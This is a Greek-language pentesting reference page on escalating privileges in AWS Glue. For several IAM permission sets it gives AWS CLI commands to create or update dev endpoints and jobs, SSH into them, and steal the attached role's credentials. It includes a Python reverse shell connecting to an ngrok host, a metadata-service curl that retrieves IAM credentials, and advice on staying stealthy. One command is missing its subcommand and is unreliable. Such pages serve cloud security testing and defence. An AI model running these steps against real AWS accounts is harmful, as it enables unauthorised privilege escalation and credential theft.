AWS - Glue Privesc

glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Οι χρήστες με αυτές τις άδειες μπορούν να ρυθμίσουν ένα νέο AWS Glue development endpoint, αναθέτοντας έναν υπάρχοντα ρόλο υπηρεσίας που μπορεί να αναληφθεί από το Glue με συγκεκριμένες άδειες σε αυτό το endpoint.

Μετά τη ρύθμιση, ο επιτιθέμενος μπορεί να SSH στο instance του endpoint, και να κλέψει τα IAM credentials του ανατεθέντος ρόλου:

# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
--role-arn <arn-role> \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Για σκοπούς μυστικότητας, συνιστάται η χρήση των IAM διαπιστευτηρίων από μέσα στην εικονική μηχανή Glue.

Πιθανές Επιπτώσεις: Privesc στον ρόλο υπηρεσίας glue που έχει καθοριστεί.

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Χρήστες με αυτή την άδεια μπορούν να αλλάξουν το υπάρχον κλειδί SSH του σημείου ανάπτυξης Glue, επιτρέποντας την πρόσβαση μέσω SSH σε αυτό. Αυτό επιτρέπει στον επιτιθέμενο να εκτελεί εντολές με τα δικαιώματα του συνημμένου ρόλου του σημείου ανάπτυξης:

# Change public key to connect
aws glue --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Πιθανές Επιπτώσεις: Privesc στον ρόλο υπηρεσίας glue που χρησιμοποιείται.

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

Χρήστες με iam:PassRole σε συνδυασμό με είτε glue:CreateJob είτε glue:UpdateJob, και είτε glue:StartJobRun είτε glue:CreateTrigger μπορούν να δημιουργήσουν ή να ενημερώσουν μια εργασία AWS Glue, συνδέοντας οποιονδήποτε λογαριασμό υπηρεσίας Glue, και να ξεκινήσουν την εκτέλεση της εργασίας. Οι δυνατότητες της εργασίας περιλαμβάνουν την εκτέλεση αυθαίρετου κώδικα Python, ο οποίος μπορεί να εκμεταλλευτεί για να εγκαταστήσει ένα reverse shell. Αυτό το reverse shell μπορεί στη συνέχεια να χρησιμοποιηθεί για να εξάγει τα διαπιστευτήρια IAM του ρόλου που συνδέεται με την εργασία Glue, οδηγώντας σε πιθανή μη εξουσιοδοτημένη πρόσβαση ή ενέργειες με βάση τις άδειες αυτού του ρόλου:

# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
--name privesctest \
--role arn:aws:iam::93424712358:role/GlueAdmin \
--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
--actions '[{"JobName": "privesctest"}]' --start-on-creation \
--schedule "0/5 * * * * *"  #Every 5mins, feel free to change

Πιθανές Επιπτώσεις: Privesc στον ρόλο υπηρεσίας glue που καθορίζεται.

glue:UpdateJob

Μόνο με την άδεια ενημέρωσης, ένας επιτιθέμενος θα μπορούσε να κλέψει τα IAM Credentials του ήδη συνημμένου ρόλου.

Πιθανές Επιπτώσεις: Privesc στον ρόλο υπηρεσίας glue που είναι συνημμένος.

Αναφορές

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/